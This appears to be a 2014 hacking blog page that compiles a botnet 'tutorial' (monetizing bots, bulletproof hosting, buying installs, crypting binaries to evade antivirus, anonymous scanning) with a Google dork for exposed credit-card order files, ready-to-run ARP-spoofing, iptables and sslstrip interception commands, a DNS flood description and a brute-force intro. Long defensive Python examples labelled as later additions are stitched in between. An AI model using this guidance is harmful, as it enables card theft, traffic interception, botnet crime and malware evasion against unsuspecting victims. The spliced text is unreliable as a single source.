Saturday, August 16, 2014

Botnet Tutorial

Botnet Q&A - The majority of answers are finally here!

This is written for those who are confused or want to do a bit of research. Are you tired of looking for answers? If so, you came to the right place.


Educational purposes only
What will this tutorial include?

What is a botnet?
What are botnets made for?
How can you monetize/profit from them?
Where to host them?
Known DDoS bots?
How do cyber criminals get away with them?
How do people get so many "bots/installs"?
Types of botnets?
What are honeypots?
Anonymous scanning?
Crypting my bin, making it undetectable?

Topic 1 - What is a botnet?
A botnet is a network of compromised computers; we call them zombies. The bot master controls all of them through his command & control (C&C) server, from which he issues commands. Control usually runs over standard network protocols such as IRC or HTTP. Many bot masters still use IRC, but note that IRC is not "more secure": it is plaintext, it usually sits on a port that stands out in traffic, and an IRC C&C is easy for defenders to join and watch. HTTP C&C blends in with ordinary web traffic and is easier to manage from a web panel, which is why I personally prefer it. Whichever you pick, beware: if the feds want the server, they will get it. To extend your knowledge I suggest visiting this article:

Topic 2 - What are botnets made for?
There are several purposes. Some people want to earn money, and make a living either by coding bots or by using them to send spam, steal information, and so on. Others simply want to prove that they can, and brag about their abilities. Bots built to steal financial information (bank logins, credit card details and other sensitive data) are called banking bots; I do not want to go into detail since that activity is disallowed here. Some bots only have DDoS functions and exist to launch DDoS attacks (the majority of DDoS bots are HTTP-based); people either sell attacks as a service to make money, or do it for "pixels", i.e. fame on the internet. Other bots send spam, and I recently noticed bots that turn infected machines into SOCKS proxies, which can be very profitable since there is high demand for private SOCKS proxies on the black market. So there are two options, and it's your call: money or fame. To extend your knowledge in this area, I suggest you visit this:

Topic 3 - How can you monetize/profit from them?
Plenty of options. What matters most is that you either have a large number of bots or bots in "high quality" countries such as US, UK, CA, AUS, FR and several other EU countries. Why high quality countries? Because of "PPI" (Pay Per Install): the buyers demand the best countries, since those users are worth more to advertisers and the machines have better specs, unlike Pakistan or Indonesia, for example.

Sending spam. This is the most common use for botnets, and also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by the botnet owners: botnets are often rented to spammers. It's the spammers who understand the real value of botnets; according to our data, an average spammer makes $50,000 - $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time.

DDoS attacks. Here too you can see that users profit: look at the "Service Offerings" section and you will see plenty, but most of them simply buy 10 booters and think they run the scene. An experienced user would rather go with a private bot, for example Dirt Jumper (which has been cracked), a really powerful tool made for attacking websites, Pandora DDoS Bot (a notorious bot; some say it's good, others give bad feedback), G-Bot and more. Most of you know these, since I have seen a lot of topics where people were trying to set them up. This might be interesting:

And how could I miss bitcoins. This is probably the easiest way to profit from your net: run a miner on the bots and it will generate BTC. Most pools pay out via PayPal, so it's much easier to collect revenue. Note that for the best performance you should enable GPU mining; computers with ATI Radeon cards will generate more, so watch out for those. I have found an estimated earnings scheme for bot masters who do this:

Botnet mining per day

  Bots       Earnings per bot per day   Total earnings
  100        x $0.03                    $3
  1,000      x $0.03                    $30
  10,000     x $0.03                    $300
  100,000    x $0.03                    $3,000

Botnet mining per week

  Bots       Earnings per bot per week  Total earnings
  100        x $0.23                    $23
  1,000      x $0.23                    $230
  10,000     x $0.23                    $2,300
  100,000    x $0.23                    $23,000

Botnet mining per month

  Bots       Earnings per bot per month Total earnings
  100        x $0.97                    $97
  1,000      x $0.97                    $970
  10,000     x $0.97                    $9,700
  100,000    x $0.97                    $97,000

I would say that isn't bad at all; if I had 200,000 bots, I would probably work from home. Keep in mind, though, that these per-bot figures predate ASIC mining: by 2014 the Bitcoin hashrate was dominated by ASICs, and CPU or GPU mining on ordinary compromised PCs earns only a tiny fraction of what this table shows.

Topic 4 - Where to host them?
It all depends. If you just want a small net, you would usually go with an offshore VPS (I do not advise shared hosting); make sure it isn't located in the US, UK or Germany and you're all good. The best countries are probably China, Taiwan, Iran, Ukraine and Singapore. Russia is "ok", but they also have some strict laws; I do not understand why most users think Russian providers have immunity, because that is not true. If you're on a budget you could always hack a box and host it there, but blame yourself when the owner removes you and your whole database, bots included, is gone. Some users go advanced: if you're hosting a large botnet and stealing details there is so-called "bulletproof hosting", which ignores all abuse reports, including DMCA, Spamhaus, etc. You want a bulletproof host? Tough luck: shared hosting goes for more than 100 bucks and servers run to $800. Really expensive, so your best call is simply an offshore location.

Topic 5 - Known DDoS bots?
I gave some information in another thread. I know most of you want a DDoS bot simply because with the press of a button you can cause massive chaos, and it's possible. One of the strongest DDoS bots is Dirt Jumper, created specifically to attack websites, with methods such as HTTP GET flood (sends GET requests; harder to block), HTTP POST flood, synchronous flood, download flood and an "anti-DDoS" flood. The thing I like most about recent bots is that they use random User-Agent strings and change HTTP headers to look like legitimate traffic, which is really smart on the coder's part, but they are usually really unstable. You would rather also have a "loader", a type of bot that is really stable; you keep your bots on the loader and it acts as a backbone that pushes the DDoS bot to them, so you get two benefits: stability and power.

Topic 6 - How do cyber criminals get away with them?
There are several methods, such as bulletproof hosting, which I already covered, and a common but interesting method that large botnets use: fast flux. Most of you do not know what that is, so I suggest you read this:

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. It can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load balancing and proxy redirection used to make malware networks more resistant to discovery and counter-measures. The Storm Worm is one of the recent malware variants to make use of this technique.
The basic idea behind fast flux is to have numerous IP addresses associated with a single fully qualified domain name, where the IP addresses are swapped in and out with extremely high frequency, through changing DNS records.

- Credits to Wikipedia.

Obviously you won't have that if you're starting off, so what I suggest is simply getting a cheap VPS with 128 MB of RAM and setting up a reverse proxy in front of your panel, so the bots only ever see the proxy's address. Those are the only methods I know at the moment.
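The fast flux description above gives the defender something to measure: one name, many addresses in many networks, swapped on short TTLs. The following is an added example, not code from the original post, that scores domains from passive-DNS style observations on exactly those features. The observations, domain names and addresses are constructed for the example (RFC 5737 documentation ranges), the /16 prefix stands in for "different network" because no ASN data is embedded, and the score weights and threshold are assumptions chosen for the illustration rather than a published formula.

```python
from collections import defaultdict
from ipaddress import ip_address

# Constructed passive-DNS style observations: (seconds since start, domain, A record, TTL).
# Domains and addresses are made up (RFC 5737 documentation ranges), not real infrastructure.
OBSERVATIONS = [
    (0,    "static.example.org", "198.51.100.7",   3600),
    (600,  "static.example.org", "198.51.100.7",   3600),
    (1200, "static.example.org", "198.51.100.7",   3600),
    (0,    "flux.example.net",   "203.0.113.14",   180),
    (200,  "flux.example.net",   "192.0.2.77",     180),
    (400,  "flux.example.net",   "198.51.100.201", 180),
    (600,  "flux.example.net",   "203.0.113.250",  180),
    (800,  "flux.example.net",   "192.0.2.9",      180),
    (1000, "flux.example.net",   "198.51.100.33",  180),
]


def prefix16(ip):
    """Coarse stand-in for 'a different network': the /16 the address falls in."""
    return ".".join(ip.split(".")[:2])


def flux_features(observations, window=3600):
    """Per domain, over the first `window` seconds: distinct A records, distinct /16
    prefixes (a proxy for distinct networks; real tools use ASN data) and lowest TTL."""
    ips = defaultdict(set)
    ttls = defaultdict(list)
    for t, domain, ip, ttl in observations:
        if t > window:
            continue
        ip_address(ip)  # raises ValueError on a malformed address
        ips[domain].add(ip)
        ttls[domain].append(ttl)
    return {d: (len(ips[d]), len({prefix16(i) for i in ips[d]}), min(ttls[d]))
            for d in ips}


def flux_score(n_ips, n_prefixes, min_ttl):
    """Heuristic score (assumed weights): many addresses spread over many networks,
    with a TTL short enough that swaps take effect quickly, is the fast-flux pattern."""
    score = 1.0 * n_ips + 3.0 * n_prefixes
    if min_ttl <= 300:
        score *= 1.5
    return score


def suspected_fast_flux(observations, threshold=12.0, window=3600):
    """Return, sorted, the domains whose score reaches the threshold."""
    feats = flux_features(observations, window)
    return sorted(d for d, (a, p, ttl) in feats.items()
                  if flux_score(a, p, ttl) >= threshold)


if __name__ == "__main__":
    for domain, (a, p, ttl) in flux_features(OBSERVATIONS).items():
        print(f"{domain}: {a} addresses, {p} prefixes, min TTL {ttl}, "
              f"score {flux_score(a, p, ttl)}")
    print("suspected fast flux:", suspected_fast_flux(OBSERVATIONS))
```

Large CDNs also answer with many addresses and short TTLs, so in practice a score like this is a triage signal to combine with the age of the domain and whether the addresses are residential ranges, not a verdict on its own.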

Topic 7 - How do people get so many "bots/installs"?
This is interesting: many of you have wondered how people get so many bots and sell them. Thousands! That's right, thousands. They either have some next-level "ub3r" spreading skills (which they don't) or they buy an exploit kit. What is an exploit kit? It's crimeware hosted on a web page that probes the visitor's browser and plugins (Java, Flash, PDF readers, etc.) for unpatched vulnerabilities and silently delivers the payload through one; you could call it a silent drive-by. Only a fraction of visitors, say 10%, actually end up running the file, so kit operators buy bulk traffic (real visitors), send it to their exploit link, and some percentage of that traffic turns into installs. Usually this gets you low quality countries such as Pakistan, Indonesia or Egypt, where users don't know what an anti-virus is and run pirated, unpatched copies of Windows. You're probably interested, but the cheapest packs go for $600 monthly. It's a wise investment, of course, if you know what you're doing.

Most common exploit kit:

List of exploit kits:

Topic 8 - Types of botnets?

DDoS Bots - To launch DDoS attacks on servers.

Banking Bots - Identity theft and theft of financial credentials. (Don't want to go into detail.)

Spam Bots - To send out spam.

SOCKS Bots - To turn infected machines into SOCKS4/SOCKS5 proxies.

Bitcoin Bots - To mine the virtual currency Bitcoin ("BTC") on infected machines.

Loaders - To hold bots in a stable environment and push other payloads to them.

Topic 9 - What are honeypots?

If you're considering getting into botnets you should know what a honeypot is. A honeypot is a machine that is deliberately exposed or deliberately infected so that its owner can capture and analyze your bot. If one of your "installs" is a honeypot, it probably belongs to an experienced user, a researcher or an AV company who wants to trace your botnet, or to another hacker who wants to get into your panel and steal your bots. Once a honeypot catches your bot, the binary gets analyzed and the C&C traced: the traffic between bot and panel is sniffed, and the panel's address, protocol and any credentials hard-coded in the sample are recovered, so your panel could be compromised within seconds. That's about it; there's not much you can do about it.

A really useful resource:

I suggest everyone visit it; you will understand how it works.

Topic 10 - Anonymous scanning?
Some of you simply scan with NoVirusThanks or VirusTotal. That is probably the worst thing you can do on your journey: never ever scan with them unless you want your files detected, because VirusTotal, for one, shares every submitted sample with the AV vendors. I would strongly recommend anonymous scanning services, those that don't distribute your file to the AV companies, so once it's scanned it won't be analyzed by anyone. I recommend the following services:

Those are the two I know, and I can assure you that you will receive quality scanning from them.

Topic 11 - Crypting my bin, making it undetectable?
This is important. Most bins will be detected by most anti-viruses, and we don't want that, since it lowers the percentage of successful executions from the installs we purchase or spread. I strongly recommend crypters coded in native languages (C/C++, Delphi, assembly), since the stubs are usually smaller and the execution rate will be higher; however, if you're looking for long-lasting stubs you would rather go with a Visual Basic stub, since it doesn't look as suspicious. I recommend: Father Crypter, Root Crypt. I haven't seen decent crypters here, but I heard some good feedback about:

Remember to re-crypt and update your bots on a regular basis, so you won't lose any machines once the stub gets detected.

Useful videos: Botnets Part 1, Botnets Part 2, Botnets Part 3, Rootkits

U-file Credit Card Database Hacking

I have only just found this elsewhere, so I have not yet tried it, but I thought I would share it for all here.

This is a basic tutorial on "hacking" U-File order forms: it shows how to find a site's U-File credit card database, so let's start.


Open this link:
As you can see, it's an order form page.

1st step: view the page source (go to the View menu and click Page Source / View Source).

2nd step: press Ctrl+F and search for "u-file=". In the code you find, the part you need from the U-File value is "_private/form_results.txt". This is the FrontPage "Save Results" form handler: U-File names the file on the server to which every submitted form, card details included, is appended.

3rd step: after getting the U-File path this is the last step; just put the U-File path after the website address, like this:

This only works because the server is serving the _private directory as plain files. FrontPage Server Extensions were supposed to deny web access to that directory, so a correctly configured server refuses the request.


How to search in Google: flowers orderform .htm | u-file=
The results depend on the search string you use to look for U-File databases.

here you go enjoy.

Best Way to Sniff HTTP and HTTPS Websites

It's not tough to hijack / capture / sniff Wi-Fi traffic on almost any network as long as you are connected to it. Once you apply the tricks below, all traffic from the other Wi-Fi clients (laptops, mobiles) gets routed through your PC, giving you every bit of information about what others are doing on the network.

How to Hijack/Capture/ Sniff HTTP traffic

We will be using ARP and iptables on a Linux machine to accomplish most of this. It's an easy and fun way to harass your friends, family or flatmates while exploring the networking protocols.

Warning: do not attempt this on a public or corporate Wi-Fi. Doing so could lead to serious consequences. In no way is Taranfx or Hack Community responsible for any harm. This is solely intended for fun at home.

Let's take 3 machines as reference for our activity:

* Real gateway router: IP address, MAC address 48:5d:34:aa:c6:aa
* Fake gateway: a laptop called hacker-laptop, IP address, MAC address 00:30:1b:47:f2:74
* Victim: a laptop on wireless called victim-laptop, IP address, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, bridges the wireless and wired segments, so ARP packets are broadcast on both.

Step 1: Enable IPv4 forwarding

Once victim-laptop starts sending the gateway's traffic to us, hacker-laptop has to pass it on. Without IP forwarding the kernel simply drops packets whose destination is not one of its own addresses instead of routing them, and the victim loses connectivity. So step 1 is to enable IP forwarding by writing a non-zero value:

root@hacker-laptop:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Set routing rules

We want a rule so that the HTTP traffic passing through hacker-laptop is redirected to hacker-laptop itself, like a NAT router doing destination NAT: it rewrites the destination address in the IP header to its own IP address on the way in and restores it on the way back.

This can be done as follows:

doxhacker@hacker-laptop:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp --dport 80 -j NETMAP --to

The iptables command has 3 components:

* Where the rule is applied: the nat table, PREROUTING chain, i.e. packets arriving from the network, before the routing decision (-t nat -A PREROUTING)
* Which packets match: TCP with destination port 80 (-p tcp --dport 80)
* What to do with them: the NETMAP target (-j NETMAP --to ...), a 1:1 address mapping that with a single address behaves like DNAT

What the command above does: "if you're a TCP packet destined for port 80 (HTTP traffic), make my address the destination", NATting both ways so this is transparent to the source.

Step 3: Adding the gateway's IP address to the interface

The networking subsystem will not let you answer ARP for an arbitrary IP address on an interface; it has to be an address actually assigned to that interface, so add the gateway's address as a secondary one (the kernel will then also answer ARP requests for it itself):

doxhacker@hacker-laptop:~$ sudo ip addr add dev eth0

and verify that both the original IP address and the gateway address are now on the interface:

doxhacker@hacker-laptop:~$ ip addr

3: eth0: mtu 1500 qdisc noqueue state UNKNOWN
link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff
inet brd scope global eth0
inet scope global secondary eth0
inet6 fe80::230:1bff:fe47:f274/64 scope link
valid_lft forever preferred_lft forever

Step 4: Responding to HTTP requests
hacker-laptop needs an HTTP server set up. It could be any server; I used Apache for ease of use. Here you can get creative, e.g. respond with your own pages for specific URLs or define a local URL, e.g.

Step 5: Pretending to be the gateway

Most of the work is already done and hacker-laptop is ready to pretend to be the Wi-Fi gateway, but the trouble is convincing victim-laptop that the MAC address of the gateway has changed to that of hacker-laptop.

The solution is a gratuitous ARP, which says "I know nobody asked, but I have the MAC address for" the gateway's IP address. Machines that hear the gratuitous ARP replace the existing mapping for that IP address in their ARP cache with the one advertised in it; ARP has no authentication, so nothing stops a host from advertising someone else's address.
There are lots of command line utilities and bindings in various programming languages that make it easy to issue ARP packets. I used the arping tool from iputils:

doxhacker@hacker-laptop:~$ sudo arping -c 3 -A -I eth0

We send an unsolicited ARP reply (-A), three times (-c 3), on the eth0 interface (-I eth0), for the gateway's IP address.

This can then be verified on the victim's machine using the "arp -a" command.

Bingo! victim-laptop now thinks the MAC address for the gateway's IP address is 00:30:1b:47:f2:74, which is hacker-laptop's address. If I browse the web on victim-laptop, I am served the resource matching the rules in hacker-laptop's web server.

Only port 80 is rewritten, so all of the non-HTTP traffic involved in viewing a web page still happens as normal. In particular, when hacker-laptop receives victim-laptop's DNS request for the test site I visited, it follows its routing rules and forwards it to the real router, which sends it out to the Internet.

The fact that hacker-laptop has rerouted and served the request is totally transparent to the client at the IP layer; victim-laptop has no clue.

Undo the changes

So, you've had enough fun and wish to revert? Here we go:

doxhacker@hacker-laptop:~$ sudo ip addr delete dev eth0

doxhacker@hacker-laptop:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to

The clients' ARP caches still hold hacker-laptop's MAC for the gateway until that entry expires, so to get them to believe the real router is the gateway again you may have to clear the entry on each client with arp -d, or bring their interfaces down and back up.
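Everything above works because nothing checks who is allowed to answer ARP for the gateway. The following is an added example, not code from the original write-up, showing the check a network defender runs against the same traffic: parse raw ARP frames and flag the three things the `arping -A` step leaves behind, an unsolicited reply, a binding change for a known address, and (for cruder tools) a sender MAC that does not match the Ethernet source. The MAC addresses are the ones from the scenario above; the IP addresses are assumed (RFC 5737 range) because the page does not give them, and the frames are constructed, not captured.

```python
import struct
from collections import namedtuple

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

ArpFrame = namedtuple("ArpFrame", "eth_src op sha spa tha tpa")


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_frame(eth_src, op, sha, spa, tha, tpa, eth_dst=BROADCAST):
    """Ethernet II header + ARP payload for IPv4 over Ethernet (used to construct samples)."""
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa)
    return eth + arp


def parse_arp_frame(frame):
    """Return an ArpFrame for an IPv4/Ethernet ARP frame, or None for anything else."""
    if len(frame) < 42:
        return None
    _dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return ArpFrame(mac_str(src), op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa))


class ArpWatcher:
    """Tracks IP -> MAC bindings seen on the wire and reports the signs of poisoning."""

    def __init__(self, trusted=None):
        self.trusted = dict(trusted or {})  # bindings known a priori, e.g. the gateway
        self.learned = {}                   # first binding observed for other hosts

    def observe(self, frame):
        arp = parse_arp_frame(frame)
        if arp is None:
            return []
        alerts = []
        # A crafted frame often carries a sender MAC that differs from the Ethernet source.
        if arp.sha != arp.eth_src:
            alerts.append(f"sender MAC {arp.sha} differs from frame source {arp.eth_src}")
        # arping -A style: an unsolicited reply whose sender and target IP are the same.
        if arp.op == ARP_REPLY and arp.spa == arp.tpa:
            alerts.append(f"gratuitous reply: {arp.spa} claims to be at {arp.sha}")
        expected = self.trusted.get(arp.spa, self.learned.get(arp.spa))
        if expected is not None and expected != arp.sha:
            alerts.append(f"binding change: {arp.spa} was {expected}, now {arp.sha}")
        elif arp.spa not in self.trusted:
            self.learned.setdefault(arp.spa, arp.sha)   # keep the first binding seen
        return alerts


# MACs from the scenario above; IPs are assumed (RFC 5737) since the page omits them.
GATEWAY_IP, GATEWAY_MAC = "192.0.2.1", "48:5d:34:aa:c6:aa"
VICTIM_IP, VICTIM_MAC = "192.0.2.50", "00:23:6c:8f:3f:95"
ATTACKER_MAC = "00:30:1b:47:f2:74"

SAMPLE_FRAMES = [  # constructed traffic, not a capture
    # victim asks who has the gateway; the gateway answers: normal
    build_arp_frame(VICTIM_MAC, ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP),
    build_arp_frame(GATEWAY_MAC, ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP, eth_dst=VICTIM_MAC),
    # hacker-laptop's `arping -A` for the gateway address: unsolicited reply, MAC changed
    build_arp_frame(ATTACKER_MAC, ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, BROADCAST, GATEWAY_IP),
]


def run_sample(trusted=None):
    """Feed the constructed frames through one watcher; return the alerts per frame."""
    watcher = ArpWatcher(trusted)
    return [watcher.observe(f) for f in SAMPLE_FRAMES]


if __name__ == "__main__":
    for i, alerts in enumerate(run_sample({GATEWAY_IP: GATEWAY_MAC})):
        print(f"frame {i}: {alerts or 'ok'}")
```

On a real network the frames would come from a raw socket or a pcap, and the gateway binding would be seeded from configuration rather than learned, since a watcher that only learns can be taught the wrong binding by whoever speaks first.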

Hacking HTTPS Websites

If you want to sniff sites that use HTTPS, try sslstrip. It sits in the middle, fetches the HTTPS version of the site itself and hands the victim a plain HTTP copy with the https:// links rewritten to http://, so logins to sites like Gmail, Yahoo and Facebook cross the wire in the clear. The caveat: it only works when the victim starts from a plain http:// page, the site is not protected by HSTS (browsers refuse to downgrade a domain they have seen HSTS for, and sites such as Google and Facebook are on the browsers' preload list), and the user does not notice the missing padlock.

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./ install

Running sslstrip

Flip your machine into forwarding mode: echo "1" > /proc/sys/net/ipv4/ip_forward

Set up iptables to redirect HTTP traffic to sslstrip: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Run sslstrip: -l <listenPort>

Run arpspoof to convince the network to send its traffic to you: arpspoof -i <interface> -t <targetIP> <gatewayIP>

Hacking Cable Modem + Wireless Hacking

In the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link, and more.

Inside Hacking the Cable Modem, you'll learn:

* the history of cable modem hacking
* how a cable modem works
* the importance of firmware (including multiple ways to install new firmware)
* how to unblock network ports and unlock hidden features
* how to hack and modify your cable modem
* what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.


How to create your own IM bot

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need are some very basic programming skills (any language will do) and web space to host your "bot".

For this example, I have created a dummy bot called “insecure” that listens to your IM messages.

If you like to write a personal IM bot, just follow these simple steps:-

Step 1: Go to and register a new account with a bot.

Step 2: Now it's time to create the bot itself, which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.

Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.

<?php
// imified calls this once per message: 'step' is the turn number, value1, value2... the earlier answers.
// break stops PHP falling through into later cases; htmlspecialchars stops a typed name injecting <br>/<reset> markup.
switch ($_REQUEST['step']) {
case 1:
    echo "Hi, what's your name?";
    break;
case 2:
    echo "Hi " . htmlspecialchars($_REQUEST['value1']) . ", where do you live?";
    break;
case 3:
    echo "Well, welcome to this hello world bot, " . htmlspecialchars($_REQUEST['value1']) . "<br>from " . htmlspecialchars($_REQUEST['value2']) . ".<reset>";
    break;
}


Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.

Step 4: Now log in to your imified account.

Step 5: Add that IM bot to your friends list. That's it.

This is a very basic bot but the possibilities are endless.

For instance, you could write a bot that sends an email to all your close friends via a simple IM message. Or you could write one that does currency conversion.

How does DNS work [Newbie Tutorial]

The internet uses DNS (Domain Name System) records to translate host names into IP addresses, and in some cases vice versa too. When you type a host name into your browser (which I would hope is Firefox or Opera, and not IE), it asks the operating system's resolver to look up the host, and that in turn asks a recursive resolver, usually your ISP's or your router's. If the recursive resolver doesn't already have the answer cached, it starts at one of the 13 root nameservers it is pre-programmed with. Surprisingly, there are only 13 root server names (a.root-servers.net through m.root-servers.net), but each of their addresses is anycast to many physical servers around the world. Some are government operated (e.g. NASA, DISA) and some are run by large companies such as VeriSign and Cogent. Just in case you think "oh, that seems easy to attack", it's not: the anycast instances spread a flood across hundreds of sites, so attacks on the roots have so far caused little more than a slight slowdown in service. The purpose of these name servers is to tell the resolver which name servers are authoritative for the next part of the name you are requesting, so that it can go ask those. These requests are made over UDP port 53 (TCP port 53 is used for large answers and zone transfers). The process is iterative, walking down multiple levels of DNS servers before you get an authoritative response. Here's an example:

1) The resolver asks a root nameserver about
2) It replies: the nameserver has that information.
3) The resolver asks about
4) It replies: the nameserver has that information.
5) The resolver asks about
6) It replies: the nameserver has that information.
7) The resolver asks about
8) It replies: the authoritative IP address of is

See how that works? Each name server passed the buck to the next one, until you finally got an answer from someone who knows it. The authoritative IP address, the A record, is stored as a DNS entry on that last name server. Other records, such as MX (mail server) and CNAME (canonical name, i.e. an alias), are also stored in the domain's zone, and you can query any of them with dig or nslookup. A separate service called "whois" returns the registration data for the domain rather than its DNS records. There are hundreds of websites that let you perform a whois lookup. My favourite is but as I said there are hundreds out there. These records often include the name, address and telephone number of the person who registered the domain, as well as the name and telephone number of the registrar that leases the domain to that person. Private individuals can use a WHOIS privacy service to keep their details out of the public record.
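The walk above is easier to follow once you have seen what actually travels over UDP port 53. The following is an added example, not code from the original post: it builds the query a stub resolver sends, parses the reply into A, NS, CNAME and MX records, and handles the name-compression pointers that make real replies small. The sample reply is constructed inline (a CNAME to a made-up host plus that host's A record in the 192.0.2.0/24 documentation range); the `resolve` helper at the end sends a live query and assumes a recursive resolver at 8.8.8.8 unless you pass another. The backward-pointer and depth checks in `decode_name` are the part worth copying: a reply whose pointers loop is a classic way to hang a naive parser.

```python
import socket
import struct

TYPE_A, TYPE_NS, TYPE_CNAME, TYPE_MX = 1, 2, 5, 15


def encode_name(name):
    """'www.example.com' -> length-prefixed labels ending in the empty root label."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(name, qtype=TYPE_A, txid=0x1234):
    """The UDP payload a stub resolver sends to port 53; flags 0x0100 = 'recursion desired'."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg, offset, depth=0):
    """Read a (possibly compressed) name at msg[offset]; return (name, offset after it).
    Compression pointers must point backwards and are followed at most 16 deep, which
    rejects a crafted message whose pointers loop."""
    if depth > 16:
        raise ValueError("too many compression pointers")
    labels = []
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # two high bits set: pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if pointer >= offset:
                raise ValueError("forward compression pointer")
            suffix, _ = decode_name(msg, pointer, depth + 1)
            labels.append(suffix)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg):
    """Return (txid, rcode, [(name, type, ttl, value), ...]) for all resource records."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                        # skip the echoed question section
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(an + ns + ar):              # answer, authority and additional sections
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if offset + rdlen > len(msg):
            raise ValueError("truncated rdata")
        if rtype == TYPE_A and rdlen == 4:
            value = ".".join(str(b) for b in msg[offset:offset + 4])
        elif rtype in (TYPE_NS, TYPE_CNAME):   # rdata is a name and may use compression
            value, _ = decode_name(msg, offset)
        elif rtype == TYPE_MX:                 # 16-bit preference, then a name
            pref = struct.unpack("!H", msg[offset:offset + 2])[0]
            value = f"{pref} " + decode_name(msg, offset + 2)[0]
        else:
            value = msg[offset:offset + rdlen].hex()
        records.append((name, rtype, ttl, value))
        offset += rdlen
    return txid, flags & 0xF, records


def sample_response():
    """Constructed reply to build_query('www.example.com'): a CNAME to a made-up host
    and the A record for that host, using pointers (0xC0xx) back into the message."""
    question = encode_name("www.example.com") + struct.pack("!HH", TYPE_A, 1)
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)  # QR, RD, RA set; 2 answers
    target = encode_name("hosts.example.net")
    rr1 = b"\xC0\x0C" + struct.pack("!HHIH", TYPE_CNAME, 1, 300, len(target)) + target
    target_off = 12 + len(question) + 2 + 10   # where `target` sits in the message
    rr2 = (struct.pack("!H", 0xC000 | target_off)
           + struct.pack("!HHIH", TYPE_A, 1, 60, 4) + bytes([192, 0, 2, 10]))
    return header + question + rr1 + rr2


def resolve(name, server="8.8.8.8", timeout=3.0):
    """Send the query over UDP/53 to a recursive resolver and parse what comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data)


if __name__ == "__main__":
    print(parse_response(sample_response()))   # offline demonstration
```

A stub resolver should also check that the reply's transaction ID and question match what it sent; with plain UDP those sixteen bits and the source port are all that stand between it and a spoofed answer.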

If you were to attack a nameserver, you could flood it with UDP packets on port 53 so that the server spends its capacity on bogus queries. Normal DNS traffic would then not always get processed, users would not be able to resolve the domain's IP address, and the result is a denial of service. In combination with a TCP SYN flood on port 80 of the web server itself, a DNS flood can take a website out completely, given enough resources.


Brute Forcing WordPress & Joomla Websites

So today we will learn how to brute force WordPress & Joomla websites (as the title says).

Many people have been asking me how to brute force them, and now you will know.

We will be using a Perl script to do this, so you'll need ActivePerl.

Download Here ===>

First of all, what is brute forcing?

It is a trial-and-error method used by programs to recover secrets such as passwords or Data Encryption Standard (DES) keys.

Just as a hacker might break into, or "crack", a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence. Against a web login like wp-login.php the "combinations" are usually a wordlist of common passwords tried against a known username such as admin, and that only works where the password is weak and the site has no rate limiting or account lockout.

Let's go!


